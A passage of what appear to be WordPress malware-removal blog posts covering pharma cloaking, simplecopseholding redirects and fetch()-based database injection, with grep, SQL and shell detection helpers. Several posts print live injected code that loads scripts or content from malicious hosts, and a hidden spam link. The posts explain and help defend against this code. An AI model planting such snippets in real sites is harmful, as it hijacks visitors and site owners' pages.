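    tmp=$(mktemp -d) || return 1
    make_sample "$tmp"
    lockout_htaccess "$tmp/public_html"
    allowlisted_names "$tmp/public_html/wp-content/uploads/.htaccess"
    padded_rule_line "$tmp/public_html/blog/.htaccess"      # 504
    rm -rf "$tmp"
}
demo
```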

    Final Cleanup Steps

    Once the malicious .htaccess files were gone, the site became accessible again. However, we still had to remove the actual backdoor files listed in the hacker’s whitelist.

    We ran a search for the following filenames and deleted them:

    • lock360.php
    • wp-l0gin.php
    • wp-the1me.php
    • wp-scr1pts.php
    • radio.php

    Is Your Bluehost Site Suspended?

    If you see a “FilesMatch” error or have found thousands of infected files on your server, do not panic. We specialize in cleaning massive cPanel infections without losing your data.

    Contact Us for Instant Malware Removal

  • WordPress Pharma Hack Fix: How to Stop Pharmaceutical Spam in Google

    If you have noticed your WordPress site ranking for keywords like “Viagra,” “Cialis,” or other pharmaceutical terms—but the site looks completely normal when you visit it—you are likely the victim of a Cloaking Attack.

    We recently cleaned a client site infected with a specific variant of this malware that hides inside a file named settings-functions.php. Here is a breakdown of how this malware works, how we found it, and how to get rid of it.

    The Symptoms: “Pharma” Scams and Hidden Files

    Our client reported that their site was being flagged for “pharmaceutical scams,” yet they couldn’t see any spam ads on the homepage. Using our security scanners, we identified a malicious file hidden deep within the active theme folder (in this case, Hello Elementor):

    wp-content/themes/hello-elementor/includes/settings-functions.php

    While the file name sounds legitimate, the code inside was a sophisticated backdoor designed to hijack the website’s search engine rankings.


    Analyzing the Malware: The “SimpleCache” Class

    This malware is clever. It masquerades as a caching plugin to avoid detection by less experienced developers.

    1. The Obfuscation (Class _keys)

    The top of the file contains a class called _keys. This is a decoder. The malware uses base64 encoding and XOR encryption to hide its true intent.

    If you look at the code, you will see strings like _keys::_dekr('_0', '_'.'1'). This translates scrambled nonsense into readable commands, allowing the hackers to hide keywords like “Viagra” or malicious URLs from simple text searches.

    2. The “SimpleCache” Disguise

    The main payload is wrapped in a class named SimpleCache. It even includes fake documentation comments claiming to handle “caching functionality” to trick site owners into thinking it is a necessary file.

    3. SEO Cloaking (The “Checkbot” Function)

    The most dangerous part of this code is the public function checkbot().

    This function checks the “User Agent” of the visitor. If the visitor is a real person, the site loads normally. However, if the visitor is Googlebot, Bingbot, or Yahoo, the malware:

    • Intercepts the request.
    • Fetches spam content from a remote server (using the httpGet function).
    • Injects that spam into your pages.

    This is why your SEO tanks while the site looks fine to you. Google is indexing the spam the malware serves it.

    4. Database Infection

    Unlike simple viruses that just sit in files, this malware creates its own tables in your WordPress database to store spam links and configurations. In the code, we can see it initializing tables for cache, settings, and tasks.

    How to Remove the “SimpleCache” Pharma Hack

    Warning: This requires editing code and database tables. If you are not comfortable with this, please contact us for professional cleanup.

    Step 1: Locate and Delete the File

    Check your active theme folder (wp-content/themes/your-theme-name/). Look for suspicious files like:

    • settings-functions.php
    • class.cache.php
    • db-cache.php

    If you open the file and see class _keys or class SimpleCache with scrambled text at the top, delete the file immediately.

    Step 2: Check functions.php

    The malware needs to be “loaded” to work. Check your theme’s functions.php file. Look for a line that includes or requires the file you just deleted (e.g., require_once('includes/settings-functions.php');). Remove that line.

    Step 3: Clean the Database

    This specific malware creates extra tables in your database that often share your table prefix (e.g., wp_). Log into phpMyAdmin and look for suspicious tables that are not part of WordPress Core or your plugins. They might be named something like:

    • wp_sc_cache
    • wp_sc_settings
    • wp_sc_tasks

    Always back up your database before dropping tables.

    Step 4: Resubmit to Google

    Once the files are gone and the database is clean, go to Google Search Console and request a re-indexing of your site. It may take a few weeks for the “Pharma” descriptions to disappear from search results.
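
    Steps 1 to 3 above can be checked from a shell before anything is deleted. This added example (not the article's own tooling) lists theme PHP files that declare class _keys or class SimpleCache, shows the functions.php lines that load them, and filters a table list down to names outside the single-site WordPress core set. The function names and the demo theme are hypothetical, and the table list is assumed to come from SHOW TABLES.

```shell
#!/bin/sh
# Added example, not the article's code. Function names and demo data are
# hypothetical; the class names are the two the article describes.

# Step 1: PHP files under THEMES_DIR that declare class _keys or SimpleCache.
# The trailing group stops "SimpleCacheHelper" and similar names from matching.
scan_theme_signatures() (
    find "$1" -type f -name '*.php' \
        -exec grep -lE 'class[[:space:]]+(_keys|SimpleCache)([^A-Za-z0-9_]|$)' {} + | sort
)

# Step 2: include/require lines (with line numbers) in the owning theme's
# functions.php that load FILE. Args: THEMES_DIR FILE
loader_lines() (
    themes=${1%/}; file=$2
    rel=${file#"$themes"/}
    fn=$themes/${rel%%/*}/functions.php
    [ -f "$fn" ] || return 0
    grep -nF -- "$(basename "$file")" "$fn" | grep -E '(include|require)(_once)?' || true
)

# Single-site WordPress core tables, without the prefix.
CORE_TABLES='commentmeta comments links options postmeta posts termmeta terms term_relationships term_taxonomy usermeta users'

# Step 3: read table names on stdin; print those that carry PREFIX but are not
# core tables. Plugin tables will also be listed, so this is a review list.
noncore_tables() (
    prefix=$1
    while IFS= read -r t; do
        case $t in "$prefix"*) ;; *) continue ;; esac
        name=${t#"$prefix"}
        case " $CORE_TABLES " in
            *" $name "*) ;;
            *) printf '%s\n' "$t" ;;
        esac
    done
)

# Constructed demo theme: one file with the signatures, its loader line in
# functions.php, and a harmless file whose class name only starts the same way.
make_demo_theme() (
    d=$1/hello-elementor
    mkdir -p "$d/includes"
    printf '%s\n' '<?php' 'class _keys { /* decoder stub */ }' 'class SimpleCache { }' \
        > "$d/includes/settings-functions.php"
    printf '%s\n' '<?php' 'class SimpleCacheHelper { }' > "$d/includes/utils.php"
    printf '%s\n' '<?php' "require_once('includes/settings-functions.php');" \
        "require get_template_directory() . '/includes/utils.php';" > "$d/functions.php"
)

# Usage: scan_theme_signatures wp-content/themes
#        loader_lines wp-content/themes <file reported above>
#        noncore_tables wp_ < table-list.txt
```

    Plugin tables also appear in the noncore_tables output, so treat it as a list to review, not a list to drop.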


    Need Help Cleaning Your Site?

    Malware like SimpleCache often creates backdoors in multiple locations. If you delete one file, it might regenerate itself the next day.

    Hire us to completely clean your WordPress site and restore your SEO.

  • WordPress Redirecting to “Play and Learn” or “Click Allow”? Check Your Theme Headers Now

    WordPress Redirecting to “Play and Learn” or “Click Allow”? Check Your Theme Headers Now

    You open your website, and for a split second, it looks normal. Then, the screen flashes, and you are suddenly redirected to a spam site asking you to “Click Allow to Verify You Are Not a Robot” or forcing a download for “Play and Learn” apps.


    You check your plugins. You check your settings. Everything looks fine.

    The problem isn’t a setting—it is a sophisticated piece of malware hiding inside your website’s most critical files: header.php, footer.php, or even the core index.php.

    This guide covers the “File-Based” variant of the simplecopseholding.com malware, which we are seeing spike this week.

    The Symptoms: “Secret” Redirects

    This malware is designed to be invisible to you (the site owner). It uses cookies and “User-Agent” detection to hide from logged-in administrators.

    • Admins: See a normal site.
    • Visitors (especially on mobile): Are redirected to scam domains like secretplans.discoveryment.my.id, exovandria.shop, or simplecopseholding.com.

    The Code: What to Look For

    Unlike the database variant we discussed previously, this version injects itself directly into your theme files.

    Based on recent scans, the code looks like a harmless font loader or a performance optimization script. Do not be fooled.

    Look for this specific block in your code:

    <script>
    (function() {
        var wf = document.createElement('script');
        wf.src = 'https://ajax.googleapis.com/ajax/libs/webfont/1.5.3/webfont.js'; 
        wf.type = 'text/javascript';
        wf.async = 'true';
        var s = document.getElementsByTagName('script')[0];
        s.parentNode.insertBefore(wf, s);
    })();
    </script>
    <link rel='dns-prefetch' href='//simplecopseholding.com' />


    Why this is dangerous:

    1. The Decoy: It loads a legitimate webfont.js from Google to look “safe” to security scanners.
    2. The Payload: The dns-prefetch tag for simplecopseholding.com is the red flag. It tells the browser to resolve the hacker’s domain in advance and quietly prepare a connection to the hacker’s server, which then triggers the redirect.

    ⚠️ IMPORTANT:

    If you see a bright red “Dangerous Site Ahead” warning in Chrome, Google has already flagged your site. You must remove the malware immediately to stop losing traffic.


    How to Remove the Malware (File-by-File)

    You need to check four specific locations where this malware loves to hide.

    1. Check header.php (Most Common)

    This file runs on every single page of your site.

    • How to fix: Go to Appearance > Theme File Editor and select Theme Header (header.php).
    • What to do: Look for the code block shown above, usually right before the </head> tag. Delete the script and the dns-prefetch line.

    2. Check functions.php (The “Persisting” Infection)

    If you delete the code from the header but it comes back instantly, it is hiding in your functions.php.

    • The Trick: The malware adds a “hook” (like wp_head) that automatically writes the virus back into your pages every time they load.
    • What to do: Open functions.php. Look for strange functions with random names (e.g., function x8s7_load_fonts()) that contain wp_head. If you see simplecopseholding inside, delete the entire function.

    3. Check footer.php

    Hackers know people check the header, so they sometimes move the code to the very bottom.

    • What to do: Open Theme Footer (footer.php) and check just before the </body> tag.

    4. Check the Core index.php

    If the redirect happens even when you switch themes, the malware is in the root of your WordPress installation.

    • Action: Connect via FTP/File Manager. Open the index.php file in your main folder.
    • Normal WordPress index.php: It should only be about 2-3 lines of code.
    • Infected index.php: If you see a giant wall of JavaScript code at the top of this file, delete the malicious code immediately.

    Why Does It Keep Coming Back?

    If you clean these files and the virus returns within minutes, you likely have a Backdoor File elsewhere on your server that is “healing” the virus.

    Common backdoor filenames we’ve seen with this attack:

    • wp-content/themes/your-theme/db.php
    • wp-includes/css/style.php
    • wp-admin/user-login.php

    Can’t Find the Code?

    This malware is known for “obfuscation” (scrambling its code to look like random letters). If you are seeing the redirect but can’t find the file responsible, I can manually trace the infection source and remove the backdoor preventing re-infection.


    FAQs

    What is the “Play and Learn” redirect?
    This is a subscription scam. The malware redirects mobile users to a page that tries to trick them into subscribing to a daily paid service (e.g., “5.05 BDT Validity 1 Days”).

    Why does my site say “Dangerous” in Chrome?
    Google Safe Browsing detects the redirect pattern. Once flagged, visitors will see a big red warning screen. You must remove the malware and request a review in Google Search Console to clear this.

    Is it safe to just restore a backup?
    Maybe, but be careful. If your backup is from 3 days ago, but the hacker installed the backdoor 2 weeks ago, you will just be restoring the virus. It is safer to clean the current files.

  • How to Remove “Fetch” Malware from WordPress Database (sengatanlebah & jasabacklink)

    How to Remove “Fetch” Malware from WordPress Database (sengatanlebah & jasabacklink)

    Most WordPress malware hides in your files—fake plugins, backdoor scripts, or modified themes. But what happens when you scan your files, everything looks clean, yet your site is still leaking data or loading spam?

    You are likely the victim of a Database Content Injection.

    We recently uncovered a sophisticated attack targeting the wp_posts table directly. Instead of uploading a virus, hackers are editing your existing pages and posts to inject malicious JavaScript.

    If you are seeing requests to sengatanlebah.shop or jasabacklink.buzz in your network tab, or if your page builder content looks “broken” in the backend, this guide is for you.

    The Symptoms: What Does This Malware Do?

    This malware is subtle. Unlike a redirect hack that sends users away immediately, this script runs silently in the background.

    Based on our analysis of infected sites, the malware injects a fetch() command. This command forces your visitor’s browser to reach out to a 3rd-party server, download a text file (often containing spam links or ads), and insert it into your webpage.

    The Malicious Domains to Watch For:

    • sengatanlebah.shop
    • jasabacklink.buzz

    The Evidence: Deconstructing the Code

    We found this infection hiding inside the content of a homepage using the Divi Page Builder. Here is the exact code block you need to look for:

    <script>
        fetch('https://sengatanlebah.shop/back.js').then((resp) => resp.text()).then(y => document.getElementById("datax").innerHTML=y);
        fetch('https://jasabacklink.buzz/backlink/sigma.js').then((resp) => resp.text()).then(y => document.getElementById("info1").innerHTML=y);
        fetch('https://jasabacklink.buzz/backlink/teratai.js').then((resp) => resp.text()).then(y => document.getElementById("info2").innerHTML=y);
    </script>

    The hacker wraps this script inside valid page builder shortcodes (like [et_pb_code]) to ensure it executes on the frontend while remaining hidden in the Visual Editor.


    ⚠️ CRITICAL WARNING: BACKUP FIRST

    STOP. Do not proceed without a backup.

    The methods below involve editing your website’s database directly. One small mistake (like a typo in a SQL command) can delete your entire website’s content permanently. There is no “Undo” button in the database.

    Before you touch anything: Go to your hosting panel or use a plugin like UpdraftPlus and create a full database backup.


    How to Detect & Remove It (3 Methods)

    Because this malware lives in your wp_posts table, file scanners like Wordfence often miss it. You have to search the database directly.

    Method 1: The “Search & Replace” Plugin (Easiest)

    If you aren’t comfortable with code, this is the safest route.

    1. Install the plugin Better Search Replace.
    2. Go to Tools > Better Search Replace.
    3. In the “Search for” box, enter just the domain: sengatanlebah.shop.
    4. Select your wp_posts table.
    5. Run a Dry Run first to see how many pages are infected.
    6. If it finds matches, you can locate those specific pages in your WordPress Dashboard and delete the code manually, or run the replacement to remove it automatically.


    Method 2: Manual Cleanup via phpMyAdmin

    If you want to see exactly what you are deleting:

    1. Log in to your hosting control panel and open phpMyAdmin.
    2. Select your website’s database.
    3. Click the Search tab at the top.
    4. Search for: jasabacklink
    5. Select the wp_posts table and click Go.
    6. Click Edit on any row that appears.
    7. Look inside the post_content box for the <script> tags shown above and delete them.


    Method 3: The Developer Way (SQL Command)

    If you are a developer or comfortable with SQL, you can surgically remove the malware from the database using a query. This is the fastest way to clean huge sites with hundreds of infected posts.

    Step 1: Verify the Infection
    Run this query to find the infected rows:

    SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%sengatanlebah%';

    Step 2: Nuke the Malware
    Once you have confirmed the pattern, use the REPLACE() function to swap the malicious domain with an empty string or a safe comment. (Note: Be extremely careful with exact string matching).

    -- Example: This replaces the domain with "REMOVED_MALWARE" to break the script safely
    UPDATE wp_posts 
    SET post_content = REPLACE(post_content, 'sengatanlebah.shop', 'REMOVED_MALWARE') 
    WHERE post_content LIKE '%sengatanlebah.shop%';

    After running this, the script will fail to load. You can then go back and strip the broken script tags at your leisure without the site being actively infected.


    How Did It Get In?

    Finding malware inside wp_posts typically points to one of two vulnerabilities:

    • Compromised Admin Account: A hacker guessed a password and edited the pages using the WordPress editor.
    • SQL Injection: A vulnerable plugin allowed an attacker to write data directly to your database without logging in.

    Final Security Hardening

    1. Rotate Database Passwords: Change the DB user password in cPanel and update wp-config.php.
    2. Check User Roles: Delete any unknown Administrator accounts.
    3. Limit Login Attempts: Install a security plugin to block brute-force attacks.

    Need Help Cleaning the Database?

    Touching the database is risky. If you are uncomfortable running SQL queries or if the malware keeps coming back after you delete it, I can handle the cleanup for you safely.


    FAQs

    What is jasabacklink.buzz?
    It is a domain associated with “Black Hat SEO.” Hackers inject scripts from this domain into compromised websites to generate fake backlinks or display spam.

    Will deleting the script break my site?
    No. This script is external malware. It has no function for your legitimate website. Removing the <script> tag and the fetch() code inside it will restore your site to normal.

    Why didn’t my security plugin find this?
    Most security plugins focus on scanning files (like .php and .js) on the server. This specific malware lives inside the content of your posts (the database), which many scanners ignore by default to save performance.

  • How to Remove Simplecopseholding.com Redirect Malware (WordPress Fix)

    How to Remove Simplecopseholding.com Redirect Malware (WordPress Fix)

    If you are reading this, you are likely panicking because your WordPress site—or your client’s site—is suddenly redirecting users to a spammy domain like simplecopseholding.com or getfix.win.

    You might have already scanned the site with a security plugin and found nothing, yet the redirect persists.

    This particular malware is part of the SocGholish / FakeUpdate family. It is nasty because it doesn’t just “break” your site; it silently injects code that waits for specific visitors (often from search engines) before hijacking their browser.

    Here is exactly what simplecopseholding.com is, how to find it in your code (even when it hides), and how to remove it for good.

    What is Simplecopseholding.com?

    Simplecopseholding.com is a malicious domain used by hackers to deliver payloads to unsuspecting visitors.

    When infected, your website loads a script from this domain. This script acts as a traffic controller:

    • It checks the visitor: Is it a real human? Are they on a mobile device?
    • It executes the redirect: If the victim matches the criteria, they are forcibly redirected to scam sites selling fake software, crypto schemes, or illegal products.
    • It hides: If you (the admin) visit the site, the code often stays dormant, making you think everything is fine.

    The Smoking Gun: What the Infection Looks Like

    Unlike some hacks that delete files, this malware injects itself into your legitimate files. Based on recent cleanups, here is the signature you need to look for.

    Open your website’s source code (Right-click > View Page Source) and search for simplecopseholding. You will likely see a dns-prefetch tag or a script tag looking exactly like this:

    <script id="hexagoncontrail-js" src="https://simplecopseholding.com/jWcTAonomVveWlRkcUjN6PF-aopGXJy" type="text/javascript"></script>
    <link rel='dns-prefetch' href='//simplecopseholding.com' />

    (Above: The malicious “hexagoncontrail” script injecting the redirect.)

    If you see dns-prefetch href='//simplecopseholding.com', your site is definitely infected.

    How to Find & Remove the Malware (3 Methods)

    Because this malware obfuscates (hides) itself inside your database or legitimate plugins, standard scans sometimes miss it. Use these methods in order.

    Method 1: The “High Sensitivity” Wordfence Scan

    If you already have Wordfence installed, it might have missed the infection because the standard scan is designed to be fast, not deep.

    1. Go to Wordfence > All Options.
    2. Scroll to General Options and check “Scan core files against repository versions”.
    3. Check “Scan theme and plugin files against repository versions”.
    4. Set “Scan sensitivity” to High Sensitivity.
    5. Run a new scan.

    If Wordfence finds a “Modified Core File” or an unknown file in wp-content/plugins, check the code manually before deleting. If you see the domain simplecopseholding inside, delete the file immediately.


    Method 2: The Terminal “Grep” Search (For Developers)

    If you have SSH access, this is the fastest way to find the hidden code. The malware often hides in header.php, footer.php, or random .js files.

    Run this command inside your public_html folder to search for the domain:

    grep -r "simplecopseholding" .

    If that returns no results, search for the script ID often associated with this campaign:

    grep -r "hexagoncontrail" .

    • Result: The terminal will show you the exact file path (e.g., ./wp-content/themes/astra/header.php) where the hacker injected the line.
    • Fix: Open that file via FTP or File Manager and delete only the malicious line.
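
    A search for one known domain only finds that domain, and the articles above name several. This added example (not from the original posts) inventories every external host referenced in theme files or a database dump, as in the injected header.php and wp_posts snippets quoted above, and reports the hosts outside an allowlist. The function names, the allowlist entries and the demo files are assumptions.

```shell
#!/bin/sh
# Added example, not the article's code. Function names, the allowlist and the
# demo files are hypothetical; the demo content is constructed from the
# snippets quoted in the articles.

# hosts_in DIR: every host that appears in a quoted absolute or protocol-relative
# URL (script src, dns-prefetch href, fetch('...')) in .php/.js/.html/.sql files.
hosts_in() (
    find "$1" -type f \( -name '*.php' -o -name '*.js' -o -name '*.html' -o -name '*.sql' \) \
        -exec grep -hoE "[\"'](https?:)?//[A-Za-z0-9.-]+\.[A-Za-z]{2,}" {} + |
        sed 's#^.*//##' | tr 'A-Z' 'a-z' | sort -u
)

# unexpected_hosts DIR ALLOWED...: hosts from hosts_in that are neither an
# allowed domain nor a subdomain of one.
unexpected_hosts() (
    dir=$1; shift
    hosts_in "$dir" | while IFS= read -r h; do
        ok=0
        for a in "$@"; do
            case $h in "$a" | *."$a") ok=1 ;; esac
        done
        [ "$ok" -eq 1 ] || printf '%s\n' "$h"
    done
)

# files_naming HOST DIR: files under DIR that contain HOST as a literal string.
files_naming() (
    find "$2" -type f -exec grep -lF -- "$1" {} + | sort
)

# Constructed demo: an infected header.php, a clean footer.php, and a one-row
# database dump carrying the injected fetch() calls.
make_demo_docroot() (
    theme=$1/wp-content/themes/astra
    mkdir -p "$theme"
    cat > "$theme/header.php" <<'EOF'
<script>
(function() {
    var wf = document.createElement('script');
    wf.src = 'https://ajax.googleapis.com/ajax/libs/webfont/1.5.3/webfont.js';
})();
</script>
<link rel='dns-prefetch' href='//simplecopseholding.com' />
EOF
    cat > "$theme/footer.php" <<'EOF'
<a href="https://example.com/contact">Contact</a>
<?php wp_footer(); ?>
EOF
    cat > "$1/dump.sql" <<'EOF'
INSERT INTO wp_posts (post_content) VALUES ('<script>fetch(\'https://sengatanlebah.shop/back.js\');fetch(\'https://jasabacklink.buzz/backlink/sigma.js\');</script>');
EOF
)

# Usage: unexpected_hosts /path/to/public_html yoursite.example googleapis.com
#        files_naming <reported host> /path/to/public_html
```

    Hosts that the malware builds at runtime or hides behind encoding never appear as a quoted URL, so an empty result here does not clear the site.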

    Method 3: The “Download & Search” Technique (Failsafe)

    If you can’t use SSH and the scanner failed:

    1. Connect to your site via FTP (FileZilla).
    2. Download your entire wp-content folder to your computer.
    3. Open the folder in VS Code (a free code editor).
    4. Press Ctrl + Shift + F (Global Search).
    5. Search for simplecopseholding.
    6. VS Code will scan every single file and show you exactly where the virus is hiding.


    Checking the Database

    Sometimes, the malware isn’t in a file—it’s injected directly into your database options (specifically into the wp_head hook).

    1. Install a plugin like “Better Search Replace” (do not run a replace yet!).
    2. Run a “Search” for simplecopseholding.
    3. If it finds matches in the wp_options table, you will need to edit that row in phpMyAdmin and remove the script tag.


    Post-Cleanup Checklist

    Once the code is gone, you aren’t safe yet. The hacker likely left a “backdoor” to get back in.

    • Change all Admin Passwords: Log everyone out and force a password reset.
    • Update Everything: Old plugins are the #1 entry point for this infection.
    • Check for “Ghost” Admins: Go to your Users tab. Do you see any admins you don’t recognize? (Look for names like adminbackup or wp-support). Delete them.
    • Resubmit to Google: If Google flagged your site as “Dangerous,” go to Search Console and request a review once the clean-up is done.

    Need Emergency Help?

    Removing simplecopseholding.com redirects can be tricky because if you delete the wrong line of code, you can crash your site. If you’ve tried these steps and the redirect is still happening, or if you want a professional to ensure the backdoor is truly closed, I can help.


    FAQs

    Why is my site redirecting only on mobile?

    This malware is “smart.” It detects the User-Agent of the visitor. It often ignores desktop users and logged-in admins to stay hidden longer, while aggressively redirecting mobile visitors to maximize scam revenue.

    Is simplecopseholding.com a virus?

    It is a domain used by a virus (specifically the SocGholish malware family). It serves the malicious JavaScript that hijacks your visitors’ browsers.

    Will this hurt my SEO?

    Yes. Google will eventually blacklist your site, showing a bright red “Deceptive Site Ahead” warning to users. You must remove the malware immediately to preserve your rankings.

  • Hacked? Weird Greek Text & Code Hidden in Your WordPress Database

    Hacked? Weird Greek Text & Code Hidden in Your WordPress Database

    Did you recently check your WordPress database or source code and find strange, unreadable blocks of code? Perhaps you noticed your website ranking for keywords related to “Greek Pharmacy” or “andrikofarmakeio”?

    If you found a script containing the ID M6bMm64IekltUmnGh3vrm9 or a function called oeYR5CtKOu7Yvb, your site has been compromised by a specific strain of SEO Spam Malware.

    You are likely asking: What is this? Why is it there? And how do I get it out?

    First: Verify This Is Your Infection

    Clients often find us after seeing this specific block of code inside their wp_posts table (often appearing right after legitimate text):

    <div id="M6bMm64IekltUmnGh3vrm9"><p><a href="https://andrikofarmakeio.com/">κοιτάξτε εδώ</a></p></div>

    It is usually followed by a script that looks like this:

    <script type="text/javascript">function oeYR5CtKOu7Yvb(){var mbO=document.getElementsByTagName...

    If this matches what you see, stop editing immediately and read below.


    What Is This Doing to My Business?

    This is known as the “Greek Pharma Hack.”

    Hackers haven’t just “broken” your site; they are parasitic. They are using your website’s good reputation to sell illicit products for a third party.

    1. They are stealing your Google Authority: The code creates a “hidden link” to a Greek pharmacy website. The code uses a trick (top:-152413851px) to push the link 152 million pixels off-screen. You can’t see it, but Google can.

    2. You face a Google Ban: Google’s bots are smart. They know this link is hidden (a technique called “Cloaking”). When they detect it, they will flag your site as “Deceptive.” Your legitimate pages will be de-indexed, and your traffic will crash.

    3. It spreads automatically: This isn’t just in one post. This malware usually injects itself into hundreds or thousands of your database rows simultaneously.

    Why You Can’t Just “Delete” It

    If you are a business owner attempting to fix this yourself via phpMyAdmin, be very careful.

    The malware inserts itself into the middle of your actual content (your blog posts, page text, and product descriptions).

    • The Risk: If you run a generic “Delete” command, you risk corrupting the formatting of your entire website, breaking images, and losing your original text.

    • The Re-infection: Deleting the code handles the symptom, not the cause. The hacker likely entered through a vulnerability in an outdated plugin or a weak password. If you delete the code without closing the door, they will simply re-infect you (often within hours).

    How We Clean This For You

    We specialize in removing SEO Spam Injections like the andrikofarmakeio variant.

    Instead of risking your data, we perform a forensic cleanup:

    1. Database Scrubbing: We use precise Regular Expressions (Regex) to surgically remove only the malicious ID M6bMm64IekltUmnGh3vrm9 and its associated script, leaving your legitimate content 100% intact.

    2. Backdoor Removal: We hunt down the “shell” or rogue file the hackers are using to access your server.

    3. Google Restoration: Once clean, we help you submit a “Reconsideration Request” to Google to get your rankings back on track.

    Don’t let hackers siphon off your traffic.

    If you see this code, contact us immediately for a specialized cleanup.
